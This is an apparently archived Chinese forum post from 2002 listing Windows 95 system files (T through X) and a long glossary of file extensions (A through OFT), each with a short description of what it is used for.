THINKJET.DRV - 打印机驱动
THREED.VBX - Windows95浏览
T1850.DRV - 打印机驱动
TIMEDATE.CPL - 时间/日期控制面板
TIMES.TTF - 时间字型
TIMESBD.TTF - 时间粗体字型
TIMESBI.TTF - 时间粗斜体字型
TIMESI.TTF - 时间斜体字型
TIMEZONE.INF - 安装信息
TIMLP232.SPD - 打印机驱动
TIPS.txt - 提示和技巧自述文件
TKPHZR32.SPD - 打印机驱动
TLNK.DOS - 网络适配驱动器
TLNK3.VXD - 网络适配驱动器
TMV1.MPD - SCSI驱动器
TOOLHELP.DLL - 16位开发工具帮助器
TOSHIBA.DRV - 打印机驱动
TOUR.EXE - 浏览文件
TPHAIII.ICM - 打印机简介
TRACERT.EXE - TCP/IP IRACEROUTE命令
TREE.COM - MS DOS树实用程序
TREEEDCL.DLL - Microsoft网络组件
TREENVCL.DLL - Microsoft网络组件
TRIUMPHI.SPD - 打印机驱动
TSD32.DLL - 声音压缩管理器
TSENG.DRV - ET4000W32显示驱动
TTY.DRV - 打印机驱动
TTY.HLP - TTY打印机驱动帮助
TYPELIB.DLL - OLE2.0

U　↑
U9415470.SPD - 打印机驱动
UBNEI.DOS - 网络适配器驱动
ULTRA124.MPD - SCSI驱动器
ULTRA24F.MPD - SCSI驱动器
UMDM16.DLL - 通用调制解调器驱动组件
UMDM32.DLL - 通用调制解调器驱动组件
UNIDRV.DLL - Microsoft通用打印机驱动库
UNIDRV.HLP - 通用打印机驱动帮助
UNIMODEM.VXD - 通用调制解调器驱动
USER32.DLL - 32位用户

V　↑
V86MMGR.VXD - V86MMGR虚拟设备
VCACHE.VXD - VCache虚拟设备
VCD.VXD - 虚拟COM驱动程序
VCOMM.VXD - VCOMM驱动程序
VCOND.VXD - Win32控制台
VDMAD.VXD - VDMAD虚拟设备
VER.DLL - 小型Win3.1安装程序16位版动态链接库
VER.NEW - 版本检测与文件安装库
VERSION.DLL - 32位版本动态链接库
VERX.DLL - 安装程序使用的版本动态库
VFAT.VXD - VFAT文件系统
VFD.VXD - 软盘虚拟设备
VFLATD.VXD - 虚拟平板帧缓存虚拟设备
VGA.DRV - VGA显示驱动程序
VIDCAP.INF - 即插即用VCD信息
VIDEOT.VXD - 视频虚拟设备
VIP.386 - TCP/IP虚拟IP设备
VJOYD.VXD - 游戏棒虚拟设备
VKD.VXD - 虚拟键盘设备
VLB32.DLL - Mail/Exchange组件
VMD.VXD - Win3.1虚拟鼠标驱动程序
VMM.VXD - 虚拟存储管理设备
VMM32.VXD - 虚拟存储管理设备
VMOUSE.VXD - 虚拟鼠标驱动程序
VNBT.386 - NetBIOS传输驱动程序
VNETBIOS.VXD - VNETBIOS虚拟设备
VNETSUP.VXD - 网络支持虚拟设备
VPD.VXD - 虚拟LPT驱动程序
VPICD.VXD - 虚拟可编程干扰控制器设备
VPOWERD.VXD - 高级电源管理虚拟设备
VREDIR.VXD - Microsoft网络32位客户端程序
VSAMI.DLL - AMI文件语法分析程序
VSASC8.DLL - ASCII文件语法分析程序
VSBMP.DLL - BMP文件语法分析程序
VSERVER.VXD - Microsoft网络32位服务器端程序
VSGIF.DLL - GIF文件语法分析程序
VSHARE.VXD - 32位共享虚拟设备驱动程序
VSMSW.DLL - Win写文件语法分析
VSPP.DLL - PowerPoint语法分析程序
VSRTF.DLL - RTF文件语法分析程序
VSTIFF.DLL - TIFF文件语法分析程序
VSW6.DLL - Word6文件语法分析程序
VSWORD.DLL - Word文件语法分析程序
VSWP5.DLL - WordPerfect5文件语法分析程序
VSXL5.DLL - Excel文件/图表语法分析程序
VTCP.386 - TCP/IP虚拟TCP驱动程序
VTDAPI.VXD - VTDAPI虚拟设备
VTDI.386 - 传输驱动接口支持程序
VXDLDR.VXD - 虚拟设备驱动程序装载器

W　↑
WAVE.INF - 即插即用音波设备信息
WDTOOOEX.MPD - SCSI驱动
WGPOADMN.DLL - Mail/Exchange组件
WHLP16T.DLL - 帮助动态链接库
WIN87EM.DLL - 80387数学仿真库
WINABC.HLP - 智能ABC帮助文件
WINBX.HLP - 表形码输入法帮助文件
WINCHA.HLP - 繁体仓颉输入法帮助文件
WINDOWS.CNT - Windows95帮助文件内容
WINDOWS.HLP - Windows95帮助文件
WINFILE.CNT - 文件管理器帮助文件内容
WINFILE.EXE - Windows工作组文件管理器
WINFILE.HLP - 文件管理器帮助文件
WINGB.HLP - 区位码输入法帮助文件
WINHLP23.HLP - Windows帮助文件
WINIME.HLP - 操作指南帮助文件
WINNM.HLP - GBK内码输入法帮助文件
WININIT.EXE - Windows初始化文件
WINIPCFG.EXE - TCP/IP配置工具
WINNEWS.TXT - Winnews信息
WINPHO.HLP - 繁体注音输入法帮助文件
WINPOPUP.EXE - POPUP工具
WINREG.DLL - 远程注册支持
WINPY.HLP - 全拼输入法帮助文件
WINSOCK.DLL - Windows的套接API
WINSY.HLP - 双拼输入法帮助文件
WINXSP.HLP - GBK双拼输入法帮助文件
WINXZM.HLP - GBK郑码输入法帮助
WINZM.HLP - 郑码输入法帮助文件
WNASPI32.DLL - Windows DLL32位ASPI
WPSUNI.DRV - 传真驱动程序
WPSUNIRE.DLL - WPS主机资源执行程序

X　↑
XCOPY.EXE - DOS XCOPY工具
XCOPY32.EXE - 文件拷贝程序
XGA.DRV - XGA显示驱动程序

Blueidea Web Team.
Moderator Of Amphitheater Forum
.::天天学习:好好向上::. www.51windows.com
系统出问题了?请看！

51windows

海娃
积分：2284
发帖：682
来自：湖南－山东
注册：2001-12-02
 发表于 2002-05-15 07:20:31 按此观看51windows的个人资料 按此发邮件给51windows 访问51windows的主页 51windows 的 oicq 是528173,查看 528173 的资料 发送悄悄话给51windows 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看51windows的IP
A 对象代码库文件
AAM Authorware shocked文件
AAS Authorware shocked包
ABF Adobe二进制屏幕字体
ABK CorelDRAW自动备份文件
ABS 该类文件有时用于指示一个摘要（就像在一篇有关科学方面的文章的一个摘要或概要，取自abstract）
ACE Ace压缩档案格式
ACL CorelDRAW 6键盘快捷键文件
ACM Windows系统目录文件
ACP Microsoft office助手预览文件
ACR 美国放射医学大学文件格式
ACT Microsoft office助手文件
ACV OS/2的驱动程序，用于压缩或解压缩音频数据
AD After Dark屏幕保护程序
ADA Ada源文件（非-GNAT）
ADB Ada源文件主体（GNAT）；HP100LX组织者的约定数据库
ADD OS/2用于引导过程的适配器驱动程序
ADF Amiga磁盘文件
ADI AutoCAD设备无关二进制绘图仪格式
ADM After Dark多模块屏幕保护；Windows NT策略模板
ADP FaxWork用于传真调制解调器的交互安装文件；Astound Dynamite文件
ADR After Dark随机屏幕保护；Smart Address的地址簿
ADS Ada源文件说明书（GNAT）
AFM Adobe的字体尺度
AF2，AF3 ABC的FlowChat文件
AI Adobe Illustrator格式图形
AIF，AIFF 音频互交换文件，Silicon Graphic and Macintosh应用程序的声音格式
AIFC 压缩AIF
AIM AOL即时信息传送
AIS ACDSee图形序列文件；Velvet Studio设备文件
AKW RoboHELP的帮助工程中所有A-关键词
ALAW 欧洲电话音频格式
ALB JASC Image Commander相册
ALL 艺术与书信库
AMS Velvet Studio音乐模块（MOD）文件；Extreme的Tracker模块文件
ANC Canon Computer的调色板文件，包含一系列可选的颜色板
ANI Windows系统中的动画光标
ANS ANSI文本文件
ANT SimAnt For Windows中保存的游戏文件
API Adobe Acrobat使用的应用程序设计接口文件
APR Lotus Approach 97文件
APS Microsoft Visual C++文件
ARC LH ARC的压缩档案文件
ARI Aristotle声音文件
ARJ Robert Jung ARJ压缩包文件
ART Xara Studio绘画文件；Canon Crayola美术文件；Clip Art文件格式；另一种光线跟踪格式；AOL使用的用Johnson—Grace压缩算法压缩的标记文件
ASA Microsoft Visual InterDev文件
ASC ASCⅡ文本文件；PGP算法加密文件
ASD Microsoft Word的自动保存文件；Microsoft高级流媒体格式（microsoft advanced streaming format，ASF）的描述文件；可用NSREX打开 Velvet Studio例子文件
ASE Velvet Studio采样文件
ASF Microsoft高级流媒体格式文件
ASM 汇编语言源文件，Pro/E装配文件
ASO Astound Dynamite对象文件
ASP 动态网页文件；ProComm Plus安装与连接脚本文件；Astound介绍文件
AST Astound多媒体文件；ClarisWorks“助手”文件
ASV DataCAD自动保存文件
ASX Cheyenne备份脚本文件；Microsoft高级流媒体重定向器文件，视频文件
ATT AT< Group 4位图文件
ATW 来自个人软件的Any Time Deluxe For Windows个人信息管理员文件
AU Sun/NeXT/DEC/UNIX声音文件；音频U-Law（读作“mu-law”）文件格式
AVB Computer Associates Inoculan反病毒软件的病毒感染后文件
AVI Microsoft Audio Video Interleave电影格式
AVR Audio Visual Research文件格式
AVS 应用程序可视化格式
AWD FaxVien文档
AWR Telsis数字储存音频文件扩展名格式
Axx ARJ压缩文件的分包序号文件，用于将一个大文件压至几个小的压缩包中（xx取01-99的数字）
A3L Authorware 3.x库文件
A4L Authorware 4.x库文件
A5L Authorware 5.x库文件
A3M，A4M Authorware Macintosh未打包文件
A4P Authorware无运行时间的打包文件
A3W，A4W，A5W 未打包的Authorware Windows文件
BAK 备份文件
BAS BASIC源文件
BAT 批处理文件
BDF West Point Bridger Designer文件
BFC Windows 95 Briefcase文档
BG Backgammon For Windows下的游戏文件
BGL Microsoft Flight Simulator（微软飞行模拟器）的视景文件
BI 二进制文件
BIF Group Wise的初始化文件
BIFF XLIFE 3D格式文件
BIN 二进制文件
BK，BK$ 有时用于代表备份版本
BKS IBM BookManager Read书架文件
BMK 书签文件
BMP Windows或OS/2位图文件
BMI Apogee BioMenace数据文件
BOOK Adobe FrameMaker Book文件
BOX Lotus Notes的邮箱文件
BPL Borlard Delph 4打包库
BQY BrioQuery文件
BRX 用于查看多媒体对象目录的文件
BSC MS Developer Studio浏览器信息文件
BSP Quake图形文件
BS1 Apogee Blake Stone数据文件
BS_ Microsoft Bookshelf Find菜单外壳扩展名
BTM Norton 应用程序使用的批处理文件
BUD Quicken的备份磁盘
BUN CakeWalk 声音捆绑文件(一种MIDI程序)
BW SGI黑白图像文件
BWV 商业波形文件
BYU BYU的电影文件格式
B4 Helix Nuts and Bolts文件
C C代码文件
C0l 台风波形文件
CAB Microsoft压缩档案文件
CAD Softdek的Drafix CAD文件
CAL CALS压缩位图；日历计划表数据
CAM Casio照相机格式
CAP 压缩音乐文件格式
CAS 逗号分开的ASCⅡ文件
CAT Quicken使用 的IntellCharge分类文件
CB Microsoft干净引导文件
CBI 二进制卷格式文件(用于IBM大型机系统)
CC Visual dBASE用户自定义类文件
CCA cc：邮件文件
CCB Visual Basic动态按钮配置文件
CCF 多媒体查看器配置文件，用于OS/2
CCH Corel图表文件
CCM Lotus cc：邮箱（例如“INBOX.CCM”）
CCO CyberChat数据文件
CCT Macromedia Director Shockwave投影
CDA CD音频轨道
CDF Microsoft频道定义格式文件
CDI Philip的高密盘交互格式
CDM Visual dBASE自定义数据模块文件
CDR CorelDRAW绘图文件；原始音频CD数据文件
CDT CorelDRAW模板
CDX CorelDRAW压缩绘图文件；Microsoft Visual FoxPro索引文件
CEL CIMFast事件语言文件
CER 证书文件（MIME x-x509-ca-cert）
CFB Compton的多媒文件
CFG 配置文件
CFM CotdFusion模板文件；Visual dBASE Windows用户定制表单
CGI 公共网关接口脚本文件
CGM 计算机图形元文件
CH OS/2配置文件
CHK 由Windows磁盘碎片整理器或磁盘扫描保存的文件碎片
CHM 编译过的HTML文件
CHR 字符集（字体文件）
CHP Ventura Publisher章节文件
CHT ChartViem文件；Harvard Graphics矢量文件
CIF Adaptec CD 创建器 CD映像文件
CIL Clip Gallery下载包
CIM SimCity 2000文件
CIN OS/2改变控制文件用于跟踪INI文件中的变化
CK1 iD/Apogee Commander Keen 1数据文件
CK2 iD/Apogee Commander Keen 2数据文件
CK3 iD/Apogee Commander Keen 3数据文件
CK4 iD /Apogee Commander Keen 4数据文件
CK5 iD /Apogee Commander Keen 5数据文件
CK6 iD /Apogee Commander Keen 6数据文件
CLASS Java类文件
CLL Crick Software Clicker文件
CLP Windows 剪贴板文件
CLS Visual Basic类文件
CMD Windows NT，OS/2的命令文件；DOS CD/M命令文件；dBASEⅡ程序文件
CMF Corel元文件
CMG Chessmaster保存的游戏文件
CMP JPEG位图文件；地址文档
CMV Corel Move动画文件
CMX Corel Presentation Exchange图像
CNF Telnet，Windows和其他其内格式会发生改变的应用程序使用的配置文件
CNM Windows应用程序菜单选项和安装文件
CNQ Compuworks Design Shop文件
CNT Windows（或其他）系统用于帮助索引或其他目的内容文件
COB TrueSpace 2对象文件
COD Microsoft C编译器产生的可显示机器码/汇编代码文件，其中附有源C代码作为注释
COM 命令文件（程序）
CPD Corel Print Office文件（图形）
CPD，CPE 传真覆盖文档
CPI Microsoft MS-DOS代码页信息文件
CPL 控制面板扩展名，Corel颜色板
CPO Corel打印存储文件
CPP C++代码文件
CPR Corel提供说明书文件
CPT Corel 照片-绘画图像
CPX Corel Presentation Exchange压缩图形文件
CRD Windows Cardfile文件
CRP Corel 提供的运行时介绍文件；Visual dBASE自定义报表文件
CRT 认证文件
CSC Corel脚本文件
CSP PC Emcee On_Screen图像
CSS 瀑布式表格文件
CST Macromedia Director Cast文件
CSV 逗号分隔的值文件
CT Scitex CT位图文件；Paint Shop Pro Grapic编辑器文件
CTL 通常用于表示一个包含控件信息的文件；FaxWork用它来保持有关每个传真收到或发出的信息
CUE Microsoft提示牌数据文件
CUR Windows光标文件
CUT Dr Halo位图文件
CV Corel版本的档案文件；Microsoft CodeView信息屏幕文件
CWK ClarisWorks数据文件.
CWS ClarisWorks模块
CXT Macromedia Director受保护的（不可编辑的）投影文件
CXX C++源代码文件
DAT 数据文件；WrodPerfect合并数据文件；用于一些MPEG格式的文件
DB Borland的Paradox 7表
DBC Microsoft Visual FoxPro数据库容器文件
DBF dBASE文件，一种由Ashton-Tate创建的格式，可以被ACT！、Lipper、FoxPro、Arago、Wordtech、Xbase和类似数据库或与数据库有关产品识别；可用数据文件（能被Excel 97打开）；Oracle 8.1.x表格空间文件
DBX DataBearn图像；Microsoft Visual FoxPro表格文件
DCM DCM模块格式文件
DCR 冲击波文件
DCS 桌面颜色分隔文件
DCT Microsoft Visual FoxPro数据库容器
DCU Delphi编译单元文件
DCX Microsoft Visual FoxPro数据库容器；基于PCX的传真图像；宏
DC5 DataCAD绘图文件
DDF Btrieve或Xtrieve数据定义文件，它包含用于描述Btrieve或Xtrieve文件的元数据
DDIF Digital Equipment或 Compaq格式，用于保存他们图像与字处理文档
DEF SmartWareⅡ数据文件；C++模块定义文件
DEFI Oracle 7 卸载脚本文件
DEM 用于表示数字高度模型的USGS基准的文件
DER 认证文件
DEWF Macintosh Sound Cap/Sound Edit录音设备格式
DGN Macintosh 95 CAD绘图文件
DIB 设备无关位图
DIC 目录
DIF 可进行数据互换的电子表格
DIG DigiLink格式；Sound DesignerⅠ音频文件
DIR MacromediaDirector文件
DIZ 描述文件
DLG C++对话框脚本文件
DLL 动态链接库
DLS 可下载声音文件
DMD Visual dBASE数据模块文件
DMF X-Trakker音乐模块（MOD）文件
DOC FrameMaker或FrameBuilder文档；Word Star文档、Word Perfect文档、Microsoft Word文档；DisplayWrite文档
DOT Microsoft Word文档模板
DPL Borland Delph3压缩库
DPR Borland Delphi工程头文件
DRAW Acorn的基于对象的矢量图像文件
DRV 驱动程序
DRW Micrografx Designer/Draw；Pro/E绘画文件
DSF Micrografx Designer VFX文件
DSG DOOM保存的文件
DSM Dynamic Studio音乐模块（MOD）文件
DSP Microsoft Developer Studio工程文件
DSQ Corel QUERY（查询）文件
DST 刺绣机图形文件
DSW Microsoft Developer Studio工作区文件
DTA Word Bank（世界银行）的STARS数据文件
DTD SGML文档类型定义（DTD）文件
DTED 地面高度数字数据（图形的数据格式）文件
DTF Symantec Q&A相关的数据库数据文件
DTM DigiTrakker模块文件
DUN Microsoft拔号网络导出文件
DV 数字视频文件（MIME）
DWD DiamondWare数字化文件
DWG AutoCAD工程图文件；AutoCAD或Generic CADD老版本的绘图格式
DXF 可进行互交换的绘图文件格式，二进制的DWG格式的文本表示；数据交换文件
DXR Macromedia Director受保护（不可编辑）电影文件
D64 Commodore的64位模拟磁盘图像文件
EDA Ensoniq ASR磁盘映像
EDD 元素定义文档（FrameMaker+SGML文档）
EDE Ensoniq EPS磁盘映像
EDK Ensoniq KT磁盘映像
EDQ Ensoniq SQ1/SQ2/Ks32磁盘映像
EDS Ensoniq SQ80磁盘映像
EDV Ensoniq VFX-SD磁盘映像
EFA Ensoniq ASR文件
EFE Ensoniq EPS文件
EFK Ensoniq KT文件
EFQ Ensoniq SQ1/SQ2/Ks32文件
EFS Ensoniq SQ80文件
EFV Ensoniq VFX-SD文件
EMD ABT扩展模块
EMF Windows增强元文件
EML Microsoft Outlook Express邮件消息（MIME RTC822）文件
ENC 重演文件
ENFF 中性文件格式扩展名
EPHTML Perl解释增强HTML文件
EPS 压缩的PostScript图像
EPSF 压缩的PostScript文件
ERI ERWin文件
ERR 当RobooHELP帮助编译器企图编译一个帮助系统源文件时用来存储错误消息的文件
EPX ERWin文件
ESPS ESPS音频文件
EUI Ensoniq ESP家族的压缩磁盘映像
EVY 特使文档
EWL Microsoft Encarta文档
EXC Microsoft Word禁止字字典
EXE 可执行文件（程序）
F FORTRAN文件
F2R Farandoyle线性模块格式
F3R Farandoyle分块线性模块格式
F77 FORTRAN文件
F90 FORTRAN文件
FAR Fradole Composer音乐模块（MOD）文件
FAV Microsoft Outlook导航条
FAX 传真类型图像
FBK Navison 金融备份
FCD 虚拟CD-ROM
FDB Navison 金融数据库
FDF Adobe Acrobat表单文档文件
FEM CADRE有限元素网络文件
FFA，FFL，FFO，FFK Microsoft快速查找文件
FFF GUS PnP银行文件格式
FFT 最终格式文本（IBM的DCA一部分）
FH3 Aldus Freehand 3绘图文件
FIF Fractal图像文件
FIG REND386/AVRIL使用的文件格式
FITS CCD照相机图像；灵活图像传输系统
FLA Macromedia Flash电影
FLC Autodesk FLIC动画文件
FLF Corel Paradox产生的格式：Navison Financials许可文件；OS/2驱动程序文件
PLI Autodesk FLIC动画
FLT StarTrekker音乐模块(MOD)文件；MultiGen Inc的Open Flight使用的文件格式；Corel过滤器文件
FM Adobe FrameMaker文档
FMB Oracle4.0版或以后版本表单的二进制源代码文件
FML 文件镜象列表（GetRight）
FMT Oracle 4.0版或以后版本表单的文本格式；Microsoft Schedule+ 打印文件
FMX Oracle 4.0版或以后版本可执行表单
FND Microsoft Explorer保存的搜索文件（Find applet）
FNG 字体组文件（字体导航器，Font Navigator）
FNK Funk Tracker模块格式
FOG Fontographer模块字体
FON 系统字体
FOR FORTRAN文件
FOT 字体相关文件
FP FileMaker Pro文件
FP1 Flying Pigs for Windows数据文件
FP3 FileMaker Pro文件
FPT FileMaker Pro文件；Microsoft Fox Pro备注字体文件
FPX FlashPix位图
FRM 表单；Frame Maker或Frame Builder文档；Oracle可执行表(3.0版或早期版本)；Visual Basic表单；WordPerfect Merge表单；DataCAD标志报表文件
FRT Microsoft FoxPro报表文件
FRX Visual Basic表单文本；Microsoft FoxPro报表文件
FSF fPrint Audit Tool文件格式
FSL Borland的Paradox 7表单；Corel Paradox保存的表单
FSM Parandoyle示例格式
FT Lotus Notes全文本索引
FTG 全文本搜索组文件，由Windows帮助系统查找时产生——可以删除，并在需要时重建起来
FTS 全文本搜索引文件，由Windows帮助系统查找时产生
FW2 Framework Ⅱ文件
FW3 Framework Ⅲ文件
FW4 Framework Ⅳ文件
FXP 经Microsoft FoxPro编译的源文件
FZB Casio FZ-1银行转储
FZF Casio FZ-1完全转储
FZV Casio FZ-1声音转储
G721 Raw CCITT G.721 $bit ADPCM格式数据
G723 Raw CCITT G.723 3或5bit ADPCM格式数据
GAL Corel多媒体管理器相集
GCD Generic CADD绘画文件（后续版本）
GCP Ground Control Point（地面控制点）文件，用于远景数据形成图像过程，经常用于生成图工程—CHIPS（copenhagen image processing system）使用这些文件
GDB InterBase数据库文件
GDM 铃声、口哨声和声音板模块格式
GED GEDCOM 系谱数据文件，用于记录和交换系谱数据的流行格式；图形环境文档绘画
GEM GEM元文件
GEN Ventura产生的文本文件
GetRight GetRight未完成的下载文件
GFC Patton&Patton FlowCharting 4 flowchart文件
GFI，GFX Genigraphics图形链接表示文件
GHO Norton 克隆磁盘映像
GID Windows 95全局索引文件（包括帮助状态）
GIF CompuServe位图文件
GIM，GIX Genigraphics图形链接介绍文件
GKH Ensoniq EPS家簇磁盘映像文件
GKS Gravis Grip Key文档
GL 动画格式
GNA Genigraphics图形链接介绍文件
GNT 生成代码，Micro Focus属性格式里的可执行代码
GNX Genigraphics图形链接介绍文件
GRA Microsoft Graph文件
GRD 用于远程视景数据产生地图过程的格式文件，通常应用于形成地图工程—CHIPS（copenhagen image processing system）使用这些文件
GRF Grapher（Golden Software公司）图形文件
GRP 程序管理组
GSM Raw GSM 6.10音频流；Raw“byte aligned（比特对齐的）” GSM 6.10音频流；US Robotics语音调制解调器
GTK Graoumftracker（老）音乐模块（MOD）文件
GT2 Graoumftracker（新）音乐模块（MOD）文件
GWX，GWZ Cenigraphis图形链接介绍文件
GZ UNIX gzip压缩文件
H C程序头文件
HCM IBM HCM配置文件
HCOM 声音工具HCOM格式
HCR IBM HCD/HCM产品配置文件
HDF 高级计算机应用程序本地中心（NCSA） geospatial Hierarchial数据格式文件
HED HighEdit文档
HEL Microsoft Hellbender格式保存的游戏文件
HEX Macintosh BinHex2.0文件
HGL HP图形语言绘图文件
HH 映射文件，包括一些话题ID和在帮助文件系统中话题的映射数字—允许运行中应用程序发送给用户合适的上下文帮助话题
HLP 帮助文件；Date CAD Windows帮助文件
HOG Lucas Arts的Dark Forces WAD文件
HPJ Visual Basic帮助工程
HPP C++程序头文件
HQX Macintosh BinHex 4.0文件
HST 历史文件
HT HyperTerminal（超级终端）
HTM，HTML 超文本文档
HTT Microsoft超文本模板
HTX 扩展HTML模板
HXM Descent2 HAM文件扩展
ICA Citrix文件
ICB Targa位图文件
ICC Kodak打印机格式文件
ICL 图标库文件
ICM 图形颜色匹配配置文件
ICO Windows图标
IDB MSDev中间层文件
IDD MIDI设备定义
IDF MIDI设备定义（Windows 95需要的文件）
IDQ Internet数据查询文件
IDX Microsoft FoxPro相关数据库索引文件；Symantec Q&A相关数据库索引文件；Microsoft Outlook Express文件
IFF 交换格式文件；Amiga ILBM
IGES 初始图形交换说明文件
IGF 插入系统元文件
IIF QuickBooks for Windows交换文件
ILBM 位图图形文件
IMA WinImage磁盘映像文件
IMG GEM映像
IMZ WinImage压缩磁盘映像文件
INC 汇编语言或动态服务器包含文件
INF 信息文件
INI 初始化文件；MWave DSP Synth的“nwsynth.ini” GMS安装；Cravis Ultrasound bank安装
INP Oracle 3.0版或早期版本的表单源代码
INRS INRS远程通信声频
INS InstallShield安装脚本；X-Internet签字文件；Ensoniq EPS字簇设备；Cell/ⅡMAC/PC抽样设备
INT 中间代码，当一个源程序经过语法检查后编译产生一个可执行代码
IOF Findit文档
IQY Microsoft Internet查询文件
ISO 根据ISD 9660有关CD-ROM文件系统标准列出CD-ROM上的文件
ISP X-Internet签字文件
IST 数字跟踪设备文件
ISU InstallShield卸装脚本
IT 脉冲跟踪系统音乐模块(MOD)文件
ITI 脉冲跟踪系统设备
ITS 脉冲跟踪系统抽样，Internet文档位置
IV Open Inventor中使用的文件格式
IVD 超过20/20微观数据维数或变量等级文件
IVP 超过20/20的用户子集配置文件
IVT 超过20/20表或集合数据文件
IVX 超过20/20微数据目录文件
IW Idlewild屏幕保护程序
IWC Install Watch文档
J62 Ricoh照相机格式
JAR Java档案文件（一种用于applet和相关文件的压缩文件）
JAVA Java源文件
JBF Paint Shop Pro图像浏览文件
JFF，JFIF，JIF JPEG文件
JMP SAS的JMPDiscovery表格统计文件
JN1 Epic MegaGames的Jill of the Jungle数据文件
JPE，JPEG，JPG JPEG图形文件
JS JavaScript源文件
JSP HTML网页，其中包含有对一个Java servlet的参考
JTF JPEG位图文件
K25 Kurzweil 2500抽样文件
KAR 卡拉OK MIDI文件（文本+MIDI）
KDC Kodak光增强器
KEY DataCAD图标工具条文件
KFX KoFak Group 4图像文件
KIZ Kodak数字明信片文件
KKW RoboHELP帮助工程索引设计器中与主题无关的K开头的所有关键字
KMP Korg Trinity KeyMap文件
KQP Konica照相机本地文件
KR1 Kurzweil 2000抽样（多软驱）文件
KRZ Kurzweil 2000抽样文件
KSF Korg Trinity抽样文件
KYE Kye游戏数据
LAB Visual dBASE标签文件
LBM Deluxe Paint位图文件
LBT，LBX Microsoft FoxPro标签文件
LDB Microsoft Access加锁文件
LDL Corel Paradox分发库
LEG Legacy文档
LES Logitech娱乐系统游戏配置文件（与REC文件一样）
LFT 3D Studio（DOS）放样文件
LGO Paintbrush（Microsoft画图应用程序）的徽标文件
LHA LZH更换文件后缀
LIB 库文件
LIN DataCAD线型文件
LIS 结构化查询报告（SQR）程序产生的输出文件
LLX Laplink交换代理
LNK Windows快捷方式文件
LOG 日志文件
LPD Helix Nut和Bolt文件
LRC Intel可视电话文件
LSL Corel Paradox保存的库文件
LSP AutoLISP、CommonLISP和其他LISP语言文件
LST 列表文件
LU ThoughtWing库单元文件
LVL Parallax Software的 Miner Descent/D2 Level扩展
LWLO Lightwave分层对象文件
LWOB Lightwave对象文件
LWP Lotus WordPro 96/97文件
LWSC Lightwave视景文件
LYR DataCAD层文件
LZH LH ARC压缩档案
LZS Skyroads数据文件
M1V MPEG相关文件(MIME“mpeg”类型)
M3D Corel Motion 3D动画文件
M3U MPEG URL（MIME声音文件）
MAC MacPaint图像文件
MAD Microsoft Access模块文件
MAF Microsoft Access表单文件
MAG 在一些日本文件中发现的图形文件格式
MAGIC 魔力邮件监视器配置文件
MAK Visual Basil或Microsoft Visual C++工程文件
MAM Microsoft Access宏
MAN UNIX手册页输出
MAP 映射文件；Duke Nukem 3D WAD游戏文件
MAQ Microsoft Access查询文件
MAR Microsoft Access报表文件
MAS Lotus Freelance Graphics Smart Master文件
MAT Microsoft Access表；3D Studio MAX材料库
MAUD MAUD抽样格式
MAX Kinetx的3DStudio MAX文件；该格式用于一个3D场景文件；Paperport文件；OrCAD设计文件
MAZ Hover迷路数据；Division的dVS/dVISE使用的文件格式
MB1 Apogee Monster Bash数据文件
MBOX Berkeley Unix邮箱格式
MBX Microsoft Outlook保存email格式；Eudora邮箱
MCC Dailerl0呼叫卡
MCP Metrowerks CodeWarrior工程文件
MCR DataCAD键盘宏文件
MCW Microsoft Word的Macintosh文档
MDA Microsoft Access内抽入器；Microsoft Access 2.0版及其后续版本的工作组事件
MDB Microsoft Access数据库
MDE Microsoft Access MDE文件
MDL 数字跟踪器音乐模块（MOD）文件；Quake模 块文件
MDN Microsoft Access空数据库模板
MDW Microsoft Access工作组文件
MDZ Microsoft Access向导模板文件
MED 音乐编辑器，OctaMED音乐模块（MOD）文件
MER 电子表格/数据库数据交换格式；FileMaker、Excel及其他软件能识别
MET 表示管理器元文件
MFG Pro/ENGINEER制造文件
MGF 在材料与几何学里的文件格式
MHTM，MHTML MHTML文档（MIME）
MI 杂项
MIC Microsoft Image Composer文件
MID MIDI音乐
MIF Adobe FramMaker交换格式
MIFF 与机器无关格式文件
MIM，MIME，MME Internet邮件扩展格式的多用途文件，经常作为发送e-mail时在AOL里附件而创建的文件；在一个多区MIM文件里的文件能用WinZip或其他类似程序打开
MLI 3D Studio的材料库格式文件
MMF Meal Master格式；一个处方类格式；Microsoft邮件文件
MMG 超过20/20表或集会数据文件
MMM Microsoft多媒体电影
MMP Mindmapor Mind Manager文件
MN2 Descent2任务文件
MND，MNI Mandelbort for Windows
MNG 多映像网络图形
MNT,MNX Microsoft FoxPro菜单文件
MNU Visual dBASE菜单文件；Intertel Systems Interact菜单文件
MOD Fast Tracker、Star Trekker、Noise Tracker(等等)音乐模块文件；Microsoft多计划电子表格；Amiga/PC磁道文件
MOV QuickTime for Windows电影
MP2 第二层MPEG音频文件
MP3 第三层MPEG音频文件
MPA MPEG相关文件，MIME“mpeg类型”
MPE，MPEG，MPG MPEG动画文件
MPP Microsoft工程文件；CAD绘图文件格式
MPR Microsoft FoxPro菜单（已编译）
MRI MRI扫描文件
MSA 魔术阴影档案
MSDL Manchester的场景描述语言
MSG Microsoft邮件消息
MSI Windows 安装器包
MSN Microsoft网络文档；Descent Mission文件
MSP Microsoft Paint（画图）位图文件；Windows Installer路径文件
MST Windows 安装器传输文件
MTM Multi 跟踪器音乐模块（MOD）文件
MUL Ultima在线
MUS 音乐
MUS10 Mus10声音
MVB Microsoft多媒体查看器文件
MWP Lotus WordPro 97 Smart Master文件
NAN Nanoscope文件(Raw Grayscale)
NAP NAP元文件
NCB Microsoft Developer Studio文件
NCD Norton改变目录
NCF NetWare命令文件；Lotus Notes内部剪切板
NDO 3D 低多边形建模器，Nendo
netCDF 网络公用数据表单
NFF 中性文件格式
NFT NetObject Fusion模板文件
NIL Norton光标库文件（EasyIcons-兼容）
NIST NIST Sphere声音
NLB Oracle 7数据
NLM NetWare可装载模块
NLS 用于本地化的国家语言支持文件（例如，Uniscape）
NLU Norton Live Update e-mail 触发器文件
NOD NetObject Fusion文件
NSF Lotus Notes数据库
NSO NetObject Fusion文档文件
NST Noise Tracker音乐模块（MOD）文件
NS2 Lotus Notes数据库（第二版）
NTF Lotus Notes数据库模板
NTX CA-Clipper索引文件
NWC Noteworthy Composer歌曲文件
NWS Microsoft Outlook Express新闻消息（MIME RFC822）
O01 台风声音文件
OBD Microsoft Office活页夹
OBJ 对象文件
OBZ Microsoft Office活页夹向导
OCX Microsoft对象链接与嵌入定制控件
ODS Microsoft Outlook Express邮箱文件
OFF 3D 网状物对象文件格式
OFN Microsoft Office FileNew文件
OFT Microsoft Outlook模板
